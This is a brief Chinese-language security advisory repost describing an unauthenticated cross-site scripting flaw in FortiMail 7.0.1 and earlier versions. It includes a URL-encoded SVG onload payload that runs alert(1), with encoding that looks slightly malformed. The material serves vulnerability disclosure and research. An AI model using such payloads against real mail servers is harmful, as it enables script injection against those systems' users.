Fortinet Fortimail 7.0.1 - XSS

2022年3月1日11:46:37评论101 views字数 282阅读0分56秒阅读模式

FortiMail 中的网页生成漏洞（“跨站点脚本”）[CWE-79] 期间输入的不当无效化可能允许未经身份验证的攻击者通过对 FortiGuard URI 保护服务的精心制作的 HTTP GET 请求执行 XSS 攻击。

版本：

FortiMail 7.0.1 及以下版本

FortiMail 6.4.5 及以下版本

FortiMail 6.2.7 及以下版本

payload：

https%3A%2F%google.com%3CSvg%2Fonload%3Dalert(1)%3E

Fortinet Fortimail 7.0.1 - XSS

原文始发于微信公众号（Khan安全攻防实验室）：Fortinet Fortimail 7.0.1 - XSS

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

本文由 admin 发表于 2022年3月1日11:46:37
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
Fortinet Fortimail 7.0.1 - XSShttps://cn-sec.com/archives/808542.html
免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉.

PG_Vmdak